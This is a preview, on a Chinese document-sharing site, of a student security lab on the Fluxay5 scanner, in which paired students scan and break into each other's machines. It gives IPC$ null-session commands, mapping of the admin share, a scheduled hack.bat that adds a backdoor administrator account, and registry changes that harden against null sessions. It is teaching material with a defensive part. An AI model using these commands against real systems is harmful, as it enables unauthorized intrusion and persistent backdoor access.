返回
使用流光fluxay5综合扫描工具并分析结果

使用流光fluxay5综合扫描工具并分析结果

ID:13820712

大小:163.50 KB

页数:5页

时间:2018-07-24

使用流光fluxay5综合扫描工具并分析结果_第1页
使用流光fluxay5综合扫描工具并分析结果_第2页
使用流光fluxay5综合扫描工具并分析结果_第3页
使用流光fluxay5综合扫描工具并分析结果_第4页
使用流光fluxay5综合扫描工具并分析结果_第5页
资源描述:

《使用流光fluxay5综合扫描工具并分析结果》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、任务二:使用流光Fluxay5综合扫描工具并分析结果 各部份功能:1:暴力破解的设置区域2:控制台输出3:扫描出来的典型漏洞列表4:扫描或者暴力破解成功的用户帐号5:扫描和暴力破解的速度控制6:扫描和暴力破解时的状态显示7:中止按钮8:探测记录查找  选择“文件(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。     扫描结束后,流光会自动打开HTML格式的扫描报告,而且还把可利用的主机列在流光界面的最下方,如图1所示。  图1单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。  图2除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描

2、工具设置:分组角色:学生A、学生B互相扫描对方主机。实验步骤:(1)开放FTP服务,允许匿名连接。(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。(3)仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。(4)根据扫描结果分析FTP漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文件。(5)根据扫描结果分析IPC$漏洞:IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者可以与目

3、标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。IPC$相关命令:1.建立和目标的ipc$连接命令:netuse\目标IPipc$“密码”/user:“ADMIN”(管理员账号),如:netuse\192.168.27.128ipc$“”/user:"administrator"2.映射网络驱动器命令(将目标主机的盘映射到本地磁盘):netuse本地盘符\目标IP盘符$,如:netusez:\192.168.27.128c$3.和目标建立了ipc$后,则可直接用IP加盘符加$访问。比如:copy文件名\IP盘符$路径文件名

4、,如:copyhack.bat\192.168.27.128c$也可直接对映射为本地磁盘的网络驱动器操作。4.管理计算机上面的账号命令:netuser..查看账号命令:netuser..建立账号命令:netusernamepasswd/add(netusersysbak123456/add:添加用户名为sysback,密码为123456的账号)..删除账号命令:netusername/delete5.管理工作组命令:netlocalgroup组名用户名/add[delete]..如:netlocalgroupadministratorssysback/add。该命令表示把sysback用

5、户添加到管理员组(administrators)。6.查看目标计算机的系统时间:nettime\ip7.在远程主机上建立计划任务:at\IPTIMECOMMAND..at\192.168.27.12813:45c:hack.bat(该命令表示在下午13点45分执行目标主机C盘中的hack.bat文件,时间一定要晚于当前远程主机系统时间)8.删除和目标的ipc$连接命令:netuse\IPipc$/del9.断开所有IPC$连接:netuse*/del10.禁止建立空连接:运行regedit,找到主键[HKEY_LOCAL_MACHINESYSTEMCurrentControl

6、SetControlLSA],把RestrictAnonymous(DWORD)的键值改为:00000001。11.禁止自动打开默认共享:找到主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters],把AutoShareServer(DWORD)的键值改为:00000000,如果不存在,就新建一个再改键值。利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:1.编写批处理文件hack.bat,文件中包含两个命令:1)建立一个新账号,2)将新账号加入administr

7、ators组。2.使用net命令与目标主机建立连接3.将批处理文件hack.back拷贝至目标主机上。4.通过计划任务使目标主机执行hack.bat文件。5.断开所有IPC$连接。6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。7.删除和目标主机的连接。执行安全防护措施:1.目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享2.重新使用net命令与目标主机建立连接,观察结果是否有变化。

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。